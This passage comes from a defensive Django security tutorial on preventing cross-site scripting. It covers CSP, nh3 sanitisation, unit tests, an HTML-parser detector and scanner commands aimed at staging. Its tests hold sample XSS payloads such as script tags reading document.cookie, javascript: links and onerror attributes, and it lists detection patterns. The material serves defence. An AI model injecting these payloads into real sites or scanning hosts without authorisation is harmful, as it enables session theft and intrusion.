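    print(summarise_csp_report(sample))
```

In a Django view the body argument would be request.body; malformed JSON raises an exception here and should be caught and discarded in real code, since the endpoint accepts unauthenticated input.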

Note: Adding 'unsafe-inline' to script-src disables protection against inline script injection entirely and negates most of CSP's XSS value. Avoid it. Move any inline <script> blocks to external .js files before deploying a strict policy. As Malcolm McDonald notes in Web Security for Developers: “This separation of JavaScript into external files is the preferred approach in web development, since it makes for a more organized codebase. Inline script tags are considered bad practice in modern web development, so banning inline JavaScript actually forces your development team into good habits.” The trade-off is that legacy sites with many inline scripts will need a refactor before a strict CSP is practical, but that refactor is worth doing regardless of CSP.

XSS Prevention Checklist: The Full Picture

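XSS in Django comes from two distinct sources: values rendered through ordinary {{ variable }} expressions, and values that deliberately bypass escaping. Auto-escaping handles the first automatically. The remaining controls address the deliberate bypasses: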

| Control | What it covers |
|---|---|
| Django auto-escaping (default) | Plain model fields in {{ variable }} expressions: escapes <, >, ', ", & automatically with no developer action required |
| Never apply mark_safe() / | safe / {% autoescape off %} to user input | The three explicit bypass routes: each disables auto-escaping and must only be used on output that has already been sanitised |
| Allowlist sanitisation with nh3 before mark_safe() | User-supplied HTML and Markdown output: strips disallowed tags, event-handler attributes, and unsafe URL schemes (javascript:, data:) before the value is marked safe |
| Replace bleach with nh3 in existing codebases | Legacy codebases only: closes the javascript: URI gap that bleach carries in its final 6.x release |
| Content Security Policy (django-csp) | Defence-in-depth browser-level control: restricts which scripts the browser will execute; blocks injected <script> tags even if sanitisation is bypassed |

Testing Your Defence

Unit Tests

    # blog/tests.py
    from django.test import TestCase

    from blog.templatetags.markdown_extras import markdown_filter


    class XSSProtectionTests(TestCase):

        def test_script_tag_is_stripped(self):
            """Raw <script> in user content must not survive as an executable tag."""
            output = str(markdown_filter('<script>alert(document.cookie)</script>'))
            self.assertNotIn('<script', output.lower())

        def test_javascript_link_is_stripped(self):
            """`javascript:` URI in a Markdown link must not reach the browser.

            This test fails with bleach in any configuration unless a custom href
            validator callback is added; it is a fundamental API gap, not a config oversight.
            """
            output = str(markdown_filter('[click me](javascript:alert(1))'))
            self.assertNotIn('javascript:', output)

        def test_event_handler_attribute_is_stripped(self):
            """Event-handler attributes on raw HTML tags must be removed."""
            output = str(markdown_filter('<img src=x onerror=alert(1)>'))
            self.assertNotIn('onerror', output)

        def test_safe_markdown_passes_through_correctly(self):
            """Legitimate Markdown must produce correct HTML after sanitisation."""
            output = str(markdown_filter('**bold** and `code`'))
            self.assertIn('<strong>bold</strong>', output)
            self.assertIn('<code>code</code>', output)
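Substring checks like the ones above are simple, but they also trip on harmless text (a post that merely mentions "onerror" would fail). A structural check is one possible refinement. The sketch below uses only the standard library; find_unsafe_markup, FORBIDDEN_TAGS, and URL_ATTRS are hypothetical names chosen for illustration, and the tag and attribute lists are assumptions, not a complete inventory of XSS vectors.

```python
from html.parser import HTMLParser

# Assumed lists for illustration; extend them to match your own allowlist policy.
FORBIDDEN_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "formaction"}


class UnsafeMarkupFinder(HTMLParser):
    """Records forbidden tags, on* attributes and javascript: URLs in parsed HTML."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before calling this.
        if tag in FORBIDDEN_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"attr:{name}")
            if name in URL_ATTRS and value:
                # Drop whitespace so "java\tscript:" is still recognised.
                scheme = "".join(value.split()).lower()
                if scheme.startswith("javascript:"):
                    self.findings.append(f"url:{name}")


def find_unsafe_markup(html):
    """Return a list of findings; an empty list means nothing was flagged."""
    finder = UnsafeMarkupFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


print(find_unsafe_markup('<img src=x onerror=alert(1)>'))    # ['attr:onerror']
print(find_unsafe_markup('<p>the onerror attribute</p>'))    # []
```

Inside a test, this would read as self.assertEqual(find_unsafe_markup(output), []). It complements the sanitiser rather than replacing it: the helper only detects, and only what its lists cover.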

Manual Verification

    python manage.py shell

    # After migrating to nh3:
    >>> from blog.templatetags.markdown_extras import markdown_filter

    >>> markdown_filter('<script>alert(1)</script>')
    ''  # correct: script tag stripped entirely

    >>> markdown_filter('[xss](javascript:alert(1))')
    # correct: the javascript: scheme is stripped; exact rendered shape depends on nh3/Ammonia version

    >>> markdown_filter('<img src=x onerror=alert(1)>')
    '<p><img src="x"></p>'  # correct: onerror stripped, src preserved

    >>> markdown_filter('**bold**')
    '<p><strong>bold</strong></p>'  # correct: safe content passes through

Automated Scanning

Run XSS-specific scanners against your staging environment only:

    # dalfox: XSS-specific scanner with DOM analysis and blind XSS detection
    dalfox url "https://staging.example.com/blog/?q=test" --follow-redirects

    # XSStrike: pattern-based XSS scanner with fuzzing engine
    python xsstrike.py -u "https://staging.example.com/blog/?q=test"

    # OWASP ZAP: active scan via the ZAP desktop UI or zap-cli
    zap-cli active-scan --scanners xss "https://staging.example.com/blog/?q=test"

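A properly sanitised Django application should produce no XSS alerts for fields that pass through the Markdown pipeline. Treat a clean scan as evidence rather than proof: scanners only try the payloads they know about, so the unit tests remain the primary regression guard.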
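Because these scanners send live attack payloads, it can help to wrap the command in a guard that refuses any host you have not explicitly approved. The following is a minimal sketch, assuming a hand-maintained allowlist: ALLOWED_SCAN_HOSTS and build_dalfox_command are hypothetical names, and the dalfox arguments are the same ones used in the command above.

```python
from urllib.parse import urlsplit

# Assumption: hosts you own and are permitted to scan; adjust to your environment.
ALLOWED_SCAN_HOSTS = {"staging.example.com", "localhost", "127.0.0.1"}


def build_dalfox_command(target_url):
    """Return the dalfox argument list, or raise if the host is not allowlisted."""
    host = urlsplit(target_url).hostname
    if host not in ALLOWED_SCAN_HOSTS:
        raise ValueError(f"refusing to scan non-staging host: {host!r}")
    return ["dalfox", "url", target_url, "--follow-redirects"]


print(build_dalfox_command("https://staging.example.com/blog/?q=test"))
```

The returned list can be passed to subprocess.run(..., check=True) from a CI job. Building the command as a list rather than a shell string also avoids quoting problems with the query string.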

At the end of the day, XSS is really just SQL Injection's frontend cousin. It happens for the exact same reason — we let untrusted data masquerade as executable code — it just targets the DOM instead of the database. Django's auto-escaping eliminates the vulnerability for the common case of rendering model fields in templates. The risk lives in the deliberate bypasses: mark_safe(), | safe, {% autoescape off %}, and Markdown rendering without an allowlist sanitiser. The golden rule here is straightforward: never drop user content into mark_safe() unless you've explicitly sanitised it first. Post 3 moves deeper into the template engine itself: Server-Side Template Injection (SSTI), what happens when user input reaches Django's template renderer directly, and why Jinja2's {{7*7}} is not the only risk.

Further Reading

- Django Docs — Automatic HTML escaping

- Django Docs — Cross-site scripting (XSS) protection

- nh3 — Python bindings for the Ammonia HTML sanitiser

- django-csp — Content Security Policy for Django

- MDN — Content Security Policy (CSP)

- OWASP A03:2021 — Injection

- OWASP XSS Prevention Cheat Sheet

- PortSwigger Web Security Academy — Cross-site scripting

- MITRE ATT&CK — T1059.007 JavaScript

- Web Security for Developers: Real Threats, Practical Defense (Malcolm McDonald) — Chapter 7: Cross-Site Scripting Attacks

- Secure Web Application Development: A Hands-On Guide with Python and Django (Matthew Baker, Apress)

Next in this series → Post 3: Server-Side Template Injection (SSTI): When Django Templates Become a Weapon